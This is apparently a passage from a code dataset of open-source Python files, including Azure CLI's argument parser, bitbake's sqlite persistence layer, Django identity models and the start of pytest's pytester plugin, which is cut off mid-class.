code stringlengths 2 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int32 2 1.05M |
|---|---|---|---|---|---|
#!/usr/bin/env python2
from distutils.core import setup
setup(name='python-hivemindrpc',
version='0.1',
description='Enhanced version of python-jsonrpc for use with Hivemind',
long_description=open('README').read(),
author='Jeff Garzik',
author_email='<jgarzik@exmulti.com>',
maintainer='Jeff Garzik',
maintainer_email='<jgarzik@exmulti.com>',
url='http://www.github.com/jgarzik/python-hivemindrpc',
packages=['hivemindrpc'],
classifiers=['License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)', 'Operating System :: OS Independent'])
| bitcoin-hivemind/hivemind | qa/rpc-tests/python-hivemindrpc/setup.py | Python | mit | 622 |
import unittest
import numpy as np
import six
import chainer
from chainer import cuda
import chainer.functions as F
from chainer import optimizers
from chainer import testing
from chainer.testing import attr
from chainer.testing import condition
if cuda.available:
cuda.init()
class LinearModel(object):
UNIT_NUM = 10
BATCH_SIZE = 32
EPOCH = 100
def __init__(self, optimizer):
self.model = chainer.FunctionSet(
l=F.Linear(self.UNIT_NUM, 2)
)
self.optimizer = optimizer
# true parameters
self.w = np.random.uniform(-1, 1,
(self.UNIT_NUM, 1)).astype(np.float32)
self.b = np.random.uniform(-1, 1, (1, )).astype(np.float32)
def _train_linear_classifier(self, model, optimizer, gpu):
def _make_label(x):
a = (np.dot(x, self.w) + self.b).reshape((self.BATCH_SIZE, ))
t = np.empty_like(a).astype(np.int32)
t[a >= 0] = 0
t[a < 0] = 1
return t
def _make_dataset(batch_size, unit_num, gpu):
x_data = np.random.uniform(
-1, 1, (batch_size, unit_num)).astype(np.float32)
t_data = _make_label(x_data)
if gpu:
x_data = cuda.to_gpu(x_data)
t_data = cuda.to_gpu(t_data)
x = chainer.Variable(x_data)
t = chainer.Variable(t_data)
return x, t
for epoch in six.moves.range(self.EPOCH):
x, t = _make_dataset(self.BATCH_SIZE, self.UNIT_NUM, gpu)
optimizer.zero_grads()
y = model.l(x)
loss = F.softmax_cross_entropy(y, t)
loss.backward()
optimizer.update()
x_test, t_test = _make_dataset(self.BATCH_SIZE, self.UNIT_NUM, gpu)
y_test = model.l(x_test)
return F.accuracy(y_test, t_test)
def _accuracy_cpu(self):
self.optimizer.setup(self.model)
return self._train_linear_classifier(self.model, self.optimizer, False)
def _accuracy_gpu(self):
model = self.model
optimizer = self.optimizer
model.to_gpu()
optimizer.setup(model)
return self._train_linear_classifier(model, optimizer, True)
def accuracy(self, gpu):
if gpu:
return cuda.to_cpu(self._accuracy_gpu().data)
else:
return self._accuracy_cpu().data
class OptimizerTestBase(object):
def create(self):
raise NotImplementedError()
def setUp(self):
self.model = LinearModel(self.create())
@condition.retry(10)
def test_linear_model_cpu(self):
self.assertGreater(self.model.accuracy(False), 0.9)
@attr.gpu
@condition.retry(10)
def test_linear_model_gpu(self):
self.assertGreater(self.model.accuracy(True), 0.9)
def test_initialize(self):
model = self.model.model
assert isinstance(model, chainer.FunctionSet)
optimizer = self.create()
optimizer.setup(model)
self.assertEqual(len(optimizer.tuples), len(model.parameters))
msg = "'params_grads' must have 'parameters' and 'gradients'"
with self.assertRaisesRegexp(ValueError, msg):
optimizer.setup('xxx')
class TestAdaDelta(OptimizerTestBase, unittest.TestCase):
def create(self):
return optimizers.AdaDelta(eps=1e-5)
class TestAdaGrad(OptimizerTestBase, unittest.TestCase):
def create(self):
return optimizers.AdaGrad(0.1)
class TestAdam(OptimizerTestBase, unittest.TestCase):
def create(self):
return optimizers.Adam(0.1)
class TestMomentumSGD(OptimizerTestBase, unittest.TestCase):
def create(self):
return optimizers.MomentumSGD(0.1)
class TestRMSprop(OptimizerTestBase, unittest.TestCase):
def create(self):
return optimizers.RMSprop(0.1)
class TestRMSpropGraves(OptimizerTestBase, unittest.TestCase):
def create(self):
return optimizers.RMSpropGraves(0.1)
class TestSGD(OptimizerTestBase, unittest.TestCase):
def create(self):
return optimizers.SGD(0.1)
testing.run_module(__name__, __file__)
| woodshop/chainer | tests/optimizers_tests/test_optimizers_by_linear_model.py | Python | mit | 4,152 |
# -*- coding: utf-8 -*-
try:
# The 'demandimport' breaks pyflakes and flake8._pyflakes
from mercurial import demandimport
except ImportError:
pass
else:
demandimport.disable()
import os
import pep8
import pyflakes
import pyflakes.checker
def patch_pyflakes():
"""Add error codes to Pyflakes messages."""
codes = dict([line.split()[::-1] for line in (
'F401 UnusedImport',
'F402 ImportShadowedByLoopVar',
'F403 ImportStarUsed',
'F404 LateFutureImport',
'F810 Redefined', # XXX Obsolete?
'F811 RedefinedWhileUnused',
'F812 RedefinedInListComp',
'F821 UndefinedName',
'F822 UndefinedExport',
'F823 UndefinedLocal',
'F831 DuplicateArgument',
'F841 UnusedVariable',
)])
for name, obj in vars(pyflakes.messages).items():
if name[0].isupper() and obj.message:
obj.flake8_msg = '%s %s' % (codes.get(name, 'F999'), obj.message)
patch_pyflakes()
class FlakesChecker(pyflakes.checker.Checker):
"""Subclass the Pyflakes checker to conform with the flake8 API."""
name = 'pyflakes'
version = pyflakes.__version__
def __init__(self, tree, filename):
filename = pep8.normalize_paths(filename)[0]
withDoctest = self.withDoctest
included_by = [include for include in self.include_in_doctest
if include != '' and filename.startswith(include)]
if included_by:
withDoctest = True
for exclude in self.exclude_from_doctest:
if exclude != '' and filename.startswith(exclude):
withDoctest = False
overlaped_by = [include for include in included_by
if include.startswith(exclude)]
if overlaped_by:
withDoctest = True
super(FlakesChecker, self).__init__(tree, filename,
withDoctest=withDoctest)
@classmethod
def add_options(cls, parser):
parser.add_option('--builtins',
help="define more built-ins, comma separated")
parser.add_option('--doctests', default=False, action='store_true',
help="check syntax of the doctests")
parser.add_option('--include-in-doctest', default='',
dest='include_in_doctest',
help='Run doctests only on these files',
type='string')
parser.add_option('--exclude-from-doctest', default='',
dest='exclude_from_doctest',
help='Skip these files when running doctests',
type='string')
parser.config_options.extend(['builtins', 'doctests',
'include-in-doctest',
'exclude-from-doctest'])
@classmethod
def parse_options(cls, options):
if options.builtins:
cls.builtIns = cls.builtIns.union(options.builtins.split(','))
cls.withDoctest = options.doctests
included_files = []
for included_file in options.include_in_doctest.split(','):
if included_file == '':
continue
if not included_file.startswith((os.sep, './', '~/')):
included_files.append('./' + included_file)
else:
included_files.append(included_file)
cls.include_in_doctest = pep8.normalize_paths(','.join(included_files))
excluded_files = []
for excluded_file in options.exclude_from_doctest.split(','):
if excluded_file == '':
continue
if not excluded_file.startswith((os.sep, './', '~/')):
excluded_files.append('./' + excluded_file)
else:
excluded_files.append(excluded_file)
cls.exclude_from_doctest = pep8.normalize_paths(
','.join(excluded_files))
inc_exc = set(cls.include_in_doctest).intersection(
set(cls.exclude_from_doctest))
if inc_exc:
raise ValueError('"%s" was specified in both the '
'include-in-doctest and exclude-from-doctest '
'options. You are not allowed to specify it in '
'both for doctesting.' % inc_exc)
def run(self):
for m in self.messages:
col = getattr(m, 'col', 0)
yield m.lineno, col, (m.flake8_msg % m.message_args), m.__class__
| wdv4758h/flake8 | flake8/_pyflakes.py | Python | mit | 4,605 |
__version_info__ = (2, 4, 2)
__version__ = ".".join(map(str, __version_info__))
| SergeyCherepanov/ansible | ansible/paramiko/_version.py | Python | mit | 80 |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import sys
import argparse
import argcomplete
import azure.cli.core.telemetry as telemetry
import azure.cli.core._help as _help
from azure.cli.core.util import CLIError
from azure.cli.core._pkg_util import handle_module_not_installed
import azure.cli.core.azlogging as azlogging
logger = azlogging.get_az_logger(__name__)
class IncorrectUsageError(CLIError):
'''Raised when a command is incorrectly used and the usage should be
displayed to the user.
'''
pass
class CaseInsensitiveChoicesCompleter(argcomplete.completers.ChoicesCompleter): # pylint: disable=too-few-public-methods
def __call__(self, prefix, **kwargs):
return (c for c in self.choices if c.lower().startswith(prefix.lower()))
# Override the choices completer with one that is case insensitive
argcomplete.completers.ChoicesCompleter = CaseInsensitiveChoicesCompleter
def enable_autocomplete(parser):
argcomplete.autocomplete = argcomplete.CompletionFinder()
argcomplete.autocomplete(parser, validator=lambda c, p: c.lower().startswith(p.lower()),
default_completer=lambda _: ())
class AzCliCommandParser(argparse.ArgumentParser):
"""ArgumentParser implementation specialized for the
Azure CLI utility.
"""
def __init__(self, **kwargs):
self.subparsers = {}
self.parents = kwargs.get('parents', [])
self.help_file = kwargs.pop('help_file', None)
# We allow a callable for description to be passed in in order to delay-load any help
# or description for a command. We better stash it away before handing it off for
# "normal" argparse handling...
self._description = kwargs.pop('description', None)
self.command_source = kwargs.pop('_command_source', None)
super(AzCliCommandParser, self).__init__(**kwargs)
def load_command_table(self, command_table):
"""Load a command table into our parser.
"""
# If we haven't already added a subparser, we
# better do it.
if not self.subparsers:
sp = self.add_subparsers(dest='_command_package')
sp.required = True
self.subparsers = {(): sp}
for command_name, metadata in command_table.items():
subparser = self._get_subparser(command_name.split())
command_verb = command_name.split()[-1]
# To work around http://bugs.python.org/issue9253, we artificially add any new
# parsers we add to the "choices" section of the subparser.
subparser.choices[command_verb] = command_verb
# inject command_module designer's help formatter -- default is HelpFormatter
fc = metadata.formatter_class or argparse.HelpFormatter
command_parser = subparser.add_parser(command_verb,
description=metadata.description,
parents=self.parents,
conflict_handler='error',
help_file=metadata.help,
formatter_class=fc,
_command_source=metadata.command_source)
argument_validators = []
argument_groups = {}
for arg in metadata.arguments.values():
if arg.validator:
argument_validators.append(arg.validator)
if arg.arg_group:
try:
group = argument_groups[arg.arg_group]
except KeyError:
# group not found so create
group_name = '{} Arguments'.format(arg.arg_group)
group = command_parser.add_argument_group(
arg.arg_group, group_name)
argument_groups[arg.arg_group] = group
param = group.add_argument(
*arg.options_list, **arg.options)
else:
try:
param = command_parser.add_argument(
*arg.options_list, **arg.options)
except argparse.ArgumentError:
dest = arg.options['dest']
if dest in ['no_wait', 'raw']:
pass
else:
raise
param.completer = arg.completer
command_parser.set_defaults(
func=metadata,
command=command_name,
_validators=argument_validators,
_parser=command_parser)
def _get_subparser(self, path):
"""For each part of the path, walk down the tree of
subparsers, creating new ones if one doesn't already exist.
"""
for length in range(0, len(path)):
parent_subparser = self.subparsers.get(tuple(path[0:length]), None)
if not parent_subparser:
# No subparser exists for the given subpath - create and register
# a new subparser.
# Since we know that we always have a root subparser (we created)
# one when we started loading the command table, and we walk the
# path from left to right (i.e. for "cmd subcmd1 subcmd2", we start
# with ensuring that a subparser for cmd exists, then for subcmd1,
# subcmd2 and so on), we know we can always back up one step and
# add a subparser if one doesn't exist
grandparent_subparser = self.subparsers[tuple(path[:length - 1])]
new_parser = grandparent_subparser.add_parser(path[length - 1])
# Due to http://bugs.python.org/issue9253, we have to give the subparser
# a destination and set it to required in order to get a
# meaningful error
parent_subparser = new_parser.add_subparsers(dest='subcommand')
parent_subparser.required = True
self.subparsers[tuple(path[0:length])] = parent_subparser
return parent_subparser
def _handle_command_package_error(self, err_msg): # pylint: disable=no-self-use
if err_msg and err_msg.startswith('argument _command_package: invalid choice:'):
import re
try:
possible_module = re.search("argument _command_package: invalid choice: '(.+?)'",
err_msg).group(1)
handle_module_not_installed(possible_module)
except AttributeError:
# regular expression pattern match failed so unable to retrieve
# module name
pass
except Exception as e: # pylint: disable=broad-except
logger.debug('Unable to handle module not installed: %s', str(e))
def validation_error(self, message):
telemetry.set_user_fault('validation error')
return super(AzCliCommandParser, self).error(message)
def error(self, message):
telemetry.set_user_fault('parse error: {}'.format(message))
self._handle_command_package_error(message)
args = {'prog': self.prog, 'message': message}
logger.error('%(prog)s: error: %(message)s', args)
self.print_usage(sys.stderr)
self.exit(2)
def format_help(self):
is_group = self.is_group()
telemetry.set_command_details(command=self.prog[3:])
telemetry.set_success(summary='show help')
_help.show_help(self.prog.split()[1:],
self._actions[-1] if is_group else self,
is_group)
self.exit()
def _check_value(self, action, value):
# Override to customize the error message when a argument is not among the available choices
# converted value must be one of the choices (if specified)
if action.choices is not None and value not in action.choices:
msg = 'invalid choice: {}'.format(value)
raise argparse.ArgumentError(action, msg)
def is_group(self):
""" Determine if this parser instance represents a group
or a command. Anything that has a func default is considered
a group. This includes any dummy commands served up by the
"filter out irrelevant commands based on argv" command filter """
cmd = self._defaults.get('func', None)
return not (cmd and cmd.handler)
def __getattribute__(self, name):
""" Since getting the description can be expensive (require module loads), we defer
this until someone actually wants to use it (i.e. show help for the command)
"""
if name == 'description':
if self._description:
self.description = self._description() \
if callable(self._description) else self._description
self._description = None
return object.__getattribute__(self, name)
| QingChenmsft/azure-cli | src/azure-cli-core/azure/cli/core/parser.py | Python | mit | 9,504 |
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""'functions describe' command."""
from googlecloudsdk.api_lib.functions import util
from googlecloudsdk.calliope import base
from googlecloudsdk.core import properties
class Describe(base.DescribeCommand):
"""Show description of a function."""
@staticmethod
def Args(parser):
"""Register flags for this command."""
parser.add_argument(
'name', help='The name of the function to describe.',
type=util.ValidateFunctionNameOrRaise)
@util.CatchHTTPErrorRaiseHTTPException
def Run(self, args):
"""This is what gets called when the user runs this command.
Args:
args: an argparse namespace. All the arguments that were provided to this
command invocation.
Returns:
The specified function with its description and configured filter.
"""
client = self.context['functions_client']
messages = self.context['functions_messages']
project = properties.VALUES.core.project.Get(required=True)
registry = self.context['registry']
function_ref = registry.Parse(
args.name, params={'projectsId': project, 'locationsId': args.region},
collection='cloudfunctions.projects.locations.functions')
# TODO(user): Use resources.py here after b/21908671 is fixed.
return client.projects_locations_functions.Get(
messages.CloudfunctionsProjectsLocationsFunctionsGetRequest(
name=function_ref.RelativeName()))
| Sorsly/subtle | google-cloud-sdk/lib/surface/functions/describe.py | Python | mit | 2,021 |
# -*- coding: utf-8 -*-
# Copyright (c) 2020, Frappe Technologies and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
class InstalledApplication(Document):
pass
| adityahase/frappe | frappe/core/doctype/installed_application/installed_application.py | Python | mit | 278 |
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
import numpy as np
fig=plt.figure(figsize=(9, 3))
map = Basemap(width=12000000,height=8000000,
resolution='l',projection='stere',
lat_ts=50,lat_0=50,lon_0=-107.)
lons, lats, x, y = map.makegrid(30, 30, returnxy=True)
ax = fig.add_subplot(121)
ax.set_title('The regular grid')
map.scatter(x, y, marker='o')
map.drawcoastlines()
ax = fig.add_subplot(122)
ax.set_title('Projection changed')
map = Basemap(width=12000000,height=9000000,projection='aeqd',
lat_0=50.,lon_0=-105.)
x, y = map(lons, lats)
map.scatter(x, y, marker='o')
map.drawcoastlines()
plt.show() | rveciana/BasemapTutorial | code_examples/utilities/makegrid.py | Python | cc0-1.0 | 675 |
"""BitBake Persistent Data Store
Used to store data in a central location such that other threads/tasks can
access them at some future date. Acts as a convenience wrapper around sqlite,
currently, providing a key/value store accessed by 'domain'.
"""
# Copyright (C) 2007 Richard Purdie
# Copyright (C) 2010 Chris Larson <chris_larson@mentor.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import collections
import logging
import os.path
import sys
import warnings
from bb.compat import total_ordering
from collections import Mapping
try:
import sqlite3
except ImportError:
from pysqlite2 import dbapi2 as sqlite3
sqlversion = sqlite3.sqlite_version_info
if sqlversion[0] < 3 or (sqlversion[0] == 3 and sqlversion[1] < 3):
raise Exception("sqlite3 version 3.3.0 or later is required.")
logger = logging.getLogger("BitBake.PersistData")
if hasattr(sqlite3, 'enable_shared_cache'):
try:
sqlite3.enable_shared_cache(True)
except sqlite3.OperationalError:
pass
@total_ordering
class SQLTable(collections.MutableMapping):
"""Object representing a table/domain in the database"""
def __init__(self, cachefile, table):
self.cachefile = cachefile
self.table = table
self.cursor = connect(self.cachefile)
self._execute("CREATE TABLE IF NOT EXISTS %s(key TEXT, value TEXT);"
% table)
def _execute(self, *query):
"""Execute a query, waiting to acquire a lock if necessary"""
count = 0
while True:
try:
return self.cursor.execute(*query)
except sqlite3.OperationalError as exc:
if 'database is locked' in str(exc) and count < 500:
count = count + 1
self.cursor.close()
self.cursor = connect(self.cachefile)
continue
raise
def __enter__(self):
self.cursor.__enter__()
return self
def __exit__(self, *excinfo):
self.cursor.__exit__(*excinfo)
def __getitem__(self, key):
data = self._execute("SELECT * from %s where key=?;" %
self.table, [key])
for row in data:
return row[1]
raise KeyError(key)
def __delitem__(self, key):
if key not in self:
raise KeyError(key)
self._execute("DELETE from %s where key=?;" % self.table, [key])
def __setitem__(self, key, value):
if not isinstance(key, basestring):
raise TypeError('Only string keys are supported')
elif not isinstance(value, basestring):
raise TypeError('Only string values are supported')
data = self._execute("SELECT * from %s where key=?;" %
self.table, [key])
exists = len(list(data))
if exists:
self._execute("UPDATE %s SET value=? WHERE key=?;" % self.table,
[value, key])
else:
self._execute("INSERT into %s(key, value) values (?, ?);" %
self.table, [key, value])
def __contains__(self, key):
return key in set(self)
def __len__(self):
data = self._execute("SELECT COUNT(key) FROM %s;" % self.table)
for row in data:
return row[0]
def __iter__(self):
data = self._execute("SELECT key FROM %s;" % self.table)
return (row[0] for row in data)
def __lt__(self, other):
if not isinstance(other, Mapping):
raise NotImplemented
return len(self) < len(other)
def values(self):
return list(self.itervalues())
def itervalues(self):
data = self._execute("SELECT value FROM %s;" % self.table)
return (row[0] for row in data)
def items(self):
return list(self.iteritems())
def iteritems(self):
return self._execute("SELECT * FROM %s;" % self.table)
def clear(self):
self._execute("DELETE FROM %s;" % self.table)
def has_key(self, key):
return key in self
class PersistData(object):
"""Deprecated representation of the bitbake persistent data store"""
def __init__(self, d):
warnings.warn("Use of PersistData is deprecated. Please use "
"persist(domain, d) instead.",
category=DeprecationWarning,
stacklevel=2)
self.data = persist(d)
logger.debug(1, "Using '%s' as the persistent data cache",
self.data.filename)
def addDomain(self, domain):
"""
Add a domain (pending deprecation)
"""
return self.data[domain]
def delDomain(self, domain):
"""
Removes a domain and all the data it contains
"""
del self.data[domain]
def getKeyValues(self, domain):
"""
Return a list of key + value pairs for a domain
"""
return self.data[domain].items()
def getValue(self, domain, key):
"""
Return the value of a key for a domain
"""
return self.data[domain][key]
def setValue(self, domain, key, value):
"""
Sets the value of a key for a domain
"""
self.data[domain][key] = value
def delValue(self, domain, key):
"""
Deletes a key/value pair
"""
del self.data[domain][key]
def connect(database):
return sqlite3.connect(database, timeout=5, isolation_level=None)
def persist(domain, d):
"""Convenience factory for SQLTable objects based upon metadata"""
import bb.utils
cachedir = (d.getVar("PERSISTENT_DIR", True) or
d.getVar("CACHE", True))
if not cachedir:
logger.critical("Please set the 'PERSISTENT_DIR' or 'CACHE' variable")
sys.exit(1)
bb.utils.mkdirhier(cachedir)
cachefile = os.path.join(cachedir, "bb_persist_data.sqlite3")
return SQLTable(cachefile, domain)
| sentient-energy/emsw-bitbake-mirror | lib/bb/persist_data.py | Python | gpl-2.0 | 6,609 |
from django.db import models
from django.core.validators import validate_email, validate_slug, validate_ipv46_address
from django.core.exceptions import ValidationError
from django.core.urlresolvers import reverse
from ava.core.models import TimeStampedModel
from ava.core_group.models import Group
from ava.core_identity.validators import validate_skype, validate_twitter
class Identity(TimeStampedModel):
# An identity is an online persona that can map to a single person, a group
# of people, or an automated service.
GROUP = 'GROUP'
PERSON = 'PERSON'
IDENTITY_TYPE_CHOICES = (
(GROUP, 'Group'),
(PERSON, 'Person'),
)
name = models.CharField(max_length=100, verbose_name='Name', null=True, blank=True)
description = models.TextField(max_length=500, verbose_name='Description', null=True, blank=True)
identity_type = models.CharField(max_length=10,
choices=IDENTITY_TYPE_CHOICES,
default=PERSON,
verbose_name='Identity Type')
groups = models.ManyToManyField(Group,
blank=True,
related_name='identities')
def __str__(self):
return self.name or ''
def get_absolute_url(self):
return reverse('identity-detail', kwargs={'pk': self.id})
class Meta:
verbose_name = 'identity'
verbose_name_plural = 'identities'
ordering = ['name']
class Person(TimeStampedModel):
first_name = models.CharField(max_length=75, validators=[validate_slug])
surname = models.CharField(max_length=75, validators=[validate_slug])
identity = models.ManyToManyField('Identity', blank=True)
def __str__(self):
return (self.first_name + " " + self.surname).strip() or ''
def get_absolute_url(self):
return reverse('person-detail', kwargs={'pk': self.id})
class Meta:
verbose_name = 'person'
verbose_name_plural = 'people'
ordering = ['surname', 'first_name']
class Identifier(TimeStampedModel):
"""
TODO: DocString
"""
EMAIL = 'EMAIL'
SKYPE = 'SKYPE'
IP = 'IPADD'
UNAME = 'UNAME'
TWITTER = 'TWITTER'
NAME = 'NAME'
IDENTIFIER_TYPE_CHOICES = (
(EMAIL, 'Email Address'),
(SKYPE, 'Skype ID'),
(IP, 'IP Address'),
(UNAME, 'Username'),
(TWITTER, 'Twitter ID'),
(NAME, 'Other name'),
)
identifier = models.CharField(max_length=100)
identifier_type = models.CharField(max_length=10,
choices=IDENTIFIER_TYPE_CHOICES,
default=EMAIL,
verbose_name='Identifier Type')
identity = models.ForeignKey('Identity', related_name='identifiers')
def __str__(self):
return self.identifier or ''
def get_absolute_url(self):
return reverse('identifier-detail', kwargs={'pk': self.id})
def clean(self):
if self.identifier_type is 'EMAIL':
try:
validate_email(self.identifier)
except ValidationError:
raise ValidationError('Identifier is not a valid email address')
if self.identifier_type is 'IPADD':
try:
validate_ipv46_address(self.identifier)
except ValidationError:
raise ValidationError('Identifier is not a valid IPv4/IPv6 address')
if self.identifier_type is 'UNAME' or self.identifier_type is 'NAME':
try:
validate_slug(self.identifier)
except ValidationError:
raise ValidationError('Identifier is not a valid username or name')
if self.identifier_type is 'SKYPE':
try:
validate_skype(self.identifier)
except ValidationError:
raise ValidationError('Identifier is not a valid Skype user name')
if self.identifier_type is 'TWITTER':
try:
validate_twitter(self.identifier)
except ValidationError:
raise ValidationError('Identifier is not a valid Twitter user name')
class Meta:
unique_together = ("identifier", "identifier_type", "identity")
ordering = ['identifier', 'identifier_type']
| cnbird1999/ava | ava/core_identity/models.py | Python | gpl-2.0 | 4,406 |
import math
def square_root ( a ):
"""Computes squar root of a
"""
espilon = 0.1e-11
x = a
while True:
y = ( x + a / x ) / 2.0
if abs( y - x ) < espilon:
return y
x = y
def test_square_root():
"""Compares custom square and math.sqrt.
"""
a = 1.0
while a < 10.0:
print a, '{:<13}'.format( square_root( a ) ), \
'{:<13}'.format( math.sqrt( a ) ), \
abs( square_root( a ) - math.sqrt( a ) )
a += 1
test_square_root()
| hacpai/show-me-the-code | Python/0033/main.py | Python | gpl-2.0 | 540 |
import os
import unittest
import mock
from pulp.server.db import connection
class PulpWebservicesTests(unittest.TestCase):
"""
Base class for tests of webservice controllers. This base is used to work around the
authentication tests for each each method
"""
def setUp(self):
connection.initialize()
self.patch1 = mock.patch('pulp.server.webservices.controllers.decorators.'
'check_preauthenticated')
self.patch2 = mock.patch('pulp.server.webservices.controllers.decorators.'
'is_consumer_authorized')
self.patch3 = mock.patch('pulp.server.webservices.http.resource_path')
self.patch4 = mock.patch('pulp.server.webservices.http.header')
self.patch5 = mock.patch('web.webapi.HTTPError')
self.patch6 = mock.patch('pulp.server.managers.factory.principal_manager')
self.patch7 = mock.patch('pulp.server.managers.factory.user_query_manager')
self.patch8 = mock.patch('pulp.server.webservices.http.uri_path')
self.mock_check_pre_auth = self.patch1.start()
self.mock_check_pre_auth.return_value = 'ws-user'
self.mock_check_auth = self.patch2.start()
self.mock_check_auth.return_value = True
self.mock_http_resource_path = self.patch3.start()
self.patch4.start()
self.patch5.start()
self.patch6.start()
self.mock_user_query_manager = self.patch7.start()
self.mock_user_query_manager.return_value.is_superuser.return_value = False
self.mock_user_query_manager.return_value.is_authorized.return_value = True
self.mock_uri_path = self.patch8.start()
self.mock_uri_path.return_value = "/mock/"
def tearDown(self):
self.patch1.stop()
self.patch2.stop()
self.patch3.stop()
self.patch4.stop()
self.patch5.stop()
self.patch6.stop()
self.patch7.stop()
self.patch8.stop()
def validate_auth(self, operation):
"""
validate that a validation check was performed for a given operation
:param operation: the operation to validate
"""
self.mock_user_query_manager.return_value.is_authorized.assert_called_once_with(mock.ANY, mock.ANY, operation)
def get_mock_uri_path(self, *args):
"""
:param object_id: the id of the object to get the uri for
:type object_id: str
"""
return os.path.join('/mock', *args) + '/' | beav/pulp | devel/pulp/devel/unit/server/base.py | Python | gpl-2.0 | 2,511 |
""" (disabled by default) support for testing pytest and pytest plugins. """
from __future__ import absolute_import, division, print_function
import codecs
import gc
import os
import platform
import re
import subprocess
import sys
import time
import traceback
from fnmatch import fnmatch
from weakref import WeakKeyDictionary
from _pytest.capture import MultiCapture, SysCapture
from _pytest._code import Source
import py
import pytest
from _pytest.main import Session, EXIT_OK
from _pytest.assertion.rewrite import AssertionRewritingHook
def pytest_addoption(parser):
# group = parser.getgroup("pytester", "pytester (self-tests) options")
parser.addoption('--lsof',
action="store_true", dest="lsof", default=False,
help=("run FD checks if lsof is available"))
parser.addoption('--runpytest', default="inprocess", dest="runpytest",
choices=("inprocess", "subprocess", ),
help=("run pytest sub runs in tests using an 'inprocess' "
"or 'subprocess' (python -m main) method"))
def pytest_configure(config):
# This might be called multiple times. Only take the first.
global _pytest_fullpath
try:
_pytest_fullpath
except NameError:
_pytest_fullpath = os.path.abspath(pytest.__file__.rstrip("oc"))
_pytest_fullpath = _pytest_fullpath.replace("$py.class", ".py")
if config.getvalue("lsof"):
checker = LsofFdLeakChecker()
if checker.matching_platform():
config.pluginmanager.register(checker)
class LsofFdLeakChecker(object):
def get_open_files(self):
out = self._exec_lsof()
open_files = self._parse_lsof_output(out)
return open_files
def _exec_lsof(self):
pid = os.getpid()
return py.process.cmdexec("lsof -Ffn0 -p %d" % pid)
def _parse_lsof_output(self, out):
def isopen(line):
return line.startswith('f') and ("deleted" not in line and
'mem' not in line and "txt" not in line and 'cwd' not in line)
open_files = []
for line in out.split("\n"):
if isopen(line):
fields = line.split('\0')
fd = fields[0][1:]
filename = fields[1][1:]
if filename.startswith('/'):
open_files.append((fd, filename))
return open_files
def matching_platform(self):
try:
py.process.cmdexec("lsof -v")
except (py.process.cmdexec.Error, UnicodeDecodeError):
# cmdexec may raise UnicodeDecodeError on Windows systems
# with locale other than english:
# https://bitbucket.org/pytest-dev/py/issues/66
return False
else:
return True
@pytest.hookimpl(hookwrapper=True, tryfirst=True)
def pytest_runtest_protocol(self, item):
lines1 = self.get_open_files()
yield
if hasattr(sys, "pypy_version_info"):
gc.collect()
lines2 = self.get_open_files()
new_fds = set([t[0] for t in lines2]) - set([t[0] for t in lines1])
leaked_files = [t for t in lines2 if t[0] in new_fds]
if leaked_files:
error = []
error.append("***** %s FD leakage detected" % len(leaked_files))
error.extend([str(f) for f in leaked_files])
error.append("*** Before:")
error.extend([str(f) for f in lines1])
error.append("*** After:")
error.extend([str(f) for f in lines2])
error.append(error[0])
error.append("*** function %s:%s: %s " % item.location)
error.append("See issue #2366")
item.warn('', "\n".join(error))
# XXX copied from execnet's conftest.py - needs to be merged
winpymap = {
'python2.7': r'C:\Python27\python.exe',
'python2.6': r'C:\Python26\python.exe',
'python3.1': r'C:\Python31\python.exe',
'python3.2': r'C:\Python32\python.exe',
'python3.3': r'C:\Python33\python.exe',
'python3.4': r'C:\Python34\python.exe',
'python3.5': r'C:\Python35\python.exe',
}
def getexecutable(name, cache={}):
try:
return cache[name]
except KeyError:
executable = py.path.local.sysfind(name)
if executable:
import subprocess
popen = subprocess.Popen([str(executable), "--version"],
universal_newlines=True, stderr=subprocess.PIPE)
out, err = popen.communicate()
if name == "jython":
if not err or "2.5" not in err:
executable = None
if "2.5.2" in err:
executable = None # http://bugs.jython.org/issue1790
elif popen.returncode != 0:
# Handle pyenv's 127.
executable = None
cache[name] = executable
return executable
@pytest.fixture(params=['python2.6', 'python2.7', 'python3.3', "python3.4",
'pypy', 'pypy3'])
def anypython(request):
name = request.param
executable = getexecutable(name)
if executable is None:
if sys.platform == "win32":
executable = winpymap.get(name, None)
if executable:
executable = py.path.local(executable)
if executable.check():
return executable
pytest.skip("no suitable %s found" % (name,))
return executable
# used at least by pytest-xdist plugin
@pytest.fixture
def _pytest(request):
""" Return a helper which offers a gethookrecorder(hook)
method which returns a HookRecorder instance which helps
to make assertions about called hooks.
"""
return PytestArg(request)
class PytestArg:
def __init__(self, request):
self.request = request
def gethookrecorder(self, hook):
hookrecorder = HookRecorder(hook._pm)
self.request.addfinalizer(hookrecorder.finish_recording)
return hookrecorder
def get_public_names(l):
"""Only return names from iterator l without a leading underscore."""
return [x for x in l if x[0] != "_"]
class ParsedCall:
def __init__(self, name, kwargs):
self.__dict__.update(kwargs)
self._name = name
def __repr__(self):
d = self.__dict__.copy()
del d['_name']
return "<ParsedCall %r(**%r)>" % (self._name, d)
class HookRecorder:
"""Record all hooks called in a plugin manager.
This wraps all the hook calls in the plugin manager, recording
each call before propagating the normal calls.
"""
def __init__(self, pluginmanager):
self._pluginmanager = pluginmanager
self.calls = []
